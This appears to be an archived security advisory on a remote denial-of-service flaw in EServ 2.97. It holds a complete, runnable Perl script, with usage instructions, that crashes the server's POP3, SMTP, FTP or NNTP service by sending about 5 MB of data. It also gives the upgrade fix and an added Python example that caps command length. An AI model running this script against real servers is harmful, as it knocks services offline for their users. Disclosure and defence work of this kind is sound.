COMMAND

    EServ DoS

SYSTEMS AFFECTED

    EServ 2.97, may be 2.98

PROBLEM

    From the security advisory by D4rkGr3y of Damage Hacking Group
    [http://www.dhgroup.org]:

    We found 4 bugs that allow killing EServ by sending data with a
    very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b,
    NNTP - 5001216b. This is not a buffer overflow, so it's impossible
    to use these bugs for privilege escalation or something like this.

    #Exploit#

    #!/usr/bin/perl
    ######################################################
    #EServ/2.97 remote DoS xsploit
    #Bugs founded in v.2.97 but I think that 2.98 is
    #vulnerable too.
    #################
    #Usage: perl EServ.DoS.pl [host] [port] [service_type]
    #Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
    #Example: perl EServ.DoS.pl localhost 110 pop
    #################
    #If something wrong or u wanna to discuss something,
    #contact me: "D4rkGr3y" <grey_1999@mail.ru> icq: 540981
    #######################################################
    use IO::Socket;

    $host = $ARGV[0];
    $port = $ARGV[1];
    $param = $ARGV[2];
    $data = "a";

    print "\n\n";
    print "#Product: EServ/2.97 - www.eserv.ru\n";
    print "#Vuln: remote DoS\n";
    print "#Xsploit by D4rkGr3y\n";
    print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";

    if ($param) {
        $num = "4950001" if $param eq "pop";
        $num = "4960000" if $param eq "smtp";
        $num = "5005312" if $param eq "ftp";
        $num = "5001215" if $param eq "nntp";
        die "Error in params\n" if !$num;
        print "Connecting...";
        $socket = IO::Socket::INET->new(PeerAddr => $host,
                                        PeerPort => $port,
                                        Proto    => "tcp",
                                        Type     => SOCK_STREAM)
            or die "Socket error.\n";
        print "OK\n";
        $buf .= $data x $num;
        print "Attacking...";
        print $socket "$buf\n";
        print "OK\n\n";
        print "Vizit us at www.dhgroup.org";
        close($socket);
    } else {
        print "Error in Params.\n";
        print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
        print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
        print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
        exit;
    }
    #EOF

SOLUTION

    Get version 2.99 from [http://www.eserv.ru]
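
    An added defensive illustration, not part of the advisory and not EServ's code: a line-oriented service can cap how many bytes it buffers while waiting for a command terminator and drop the peer once the cap is exceeded. All class and function names and the per-service limits are assumptions made for this example; the 4950001-byte size used to exercise it is the POP3 figure quoted above.

```python
# Added example: per-command input cap for line-oriented services.
# MAX_LINE values are illustrative assumptions, not EServ settings.
MAX_LINE = {"ftp": 4096, "pop": 255, "smtp": 512, "nntp": 512}

class LineTooLong(Exception):
    """Peer sent more than the cap without terminating the line."""

class BoundedLineReader:
    def __init__(self, service):
        self.limit = MAX_LINE[service]
        self.buf = bytearray()
        self.peak = 0  # most bytes ever buffered, useful for auditing

    def feed(self, chunk):
        """Take one recv() chunk and return the lines it completed."""
        lines, start = [], 0
        while start < len(chunk):
            nl = chunk.find(b"\n", start)
            end = len(chunk) if nl < 0 else nl + 1
            # Enforce the cap before copying, so the buffer never exceeds it.
            if len(self.buf) + (end - start) > self.limit:
                self.buf.clear()
                raise LineTooLong(f"line exceeds {self.limit} bytes")
            self.buf += chunk[start:end]
            self.peak = max(self.peak, len(self.buf))
            if nl >= 0:
                lines.append(bytes(self.buf).rstrip(b"\r\n"))
                self.buf.clear()
            start = end
        return lines

def handle(service, chunks):
    """Drive a reader over recv() chunks; stop at the first violation."""
    reader, accepted, seen = BoundedLineReader(service), [], 0
    for chunk in chunks:
        seen += 1
        try:
            accepted += reader.feed(chunk)
        except LineTooLong:
            return accepted, "dropped", seen, reader.peak
    return accepted, "ok", seen, reader.peak

def constructed_stream(size, step=65536):
    """Constructed test input: one valid command, then `size` filler bytes."""
    yield b"USER bob\r\n"
    for sent in range(0, size, step):
        yield b"a" * min(step, size - sent)
    yield b"\n"
```

    Because `handle` stops consuming at the first violation, the oversized stream is abandoned after its second chunk and the server never holds more than the cap in memory.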